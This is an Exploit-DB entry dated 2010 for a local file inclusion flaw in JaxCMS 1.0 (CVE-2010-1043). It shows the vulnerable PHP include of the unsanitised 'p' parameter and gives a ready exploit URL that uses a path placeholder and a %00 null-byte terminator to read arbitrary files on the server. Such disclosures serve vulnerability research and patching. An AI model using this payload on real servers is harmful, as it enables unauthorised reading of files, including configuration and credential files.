JaxCMS 1.0 - Local File Inclusion
Author: Hamza 'MizoZ' N. type: webapps platform: php port: date_added: 2010-02-07 date_updated: verified: 1 codes: OSVDB-62161;CVE-2010-1043 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comJaxCMS1.0.zip raw file: 11359.txt
/* Name : JaxCMS (p) Local File Include WebSite : http://www.pixiescripts.com/ Author : Hamza 'MizoZ' N. Email : mizozx@gmail.com<mailto:mizozx@gmail.com> Greetz : Zuka ! */ The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php' So we can read any file in the server . EXPLOIT : http://server/[JaxCMS PATH]/index.php?p=[LFI]%00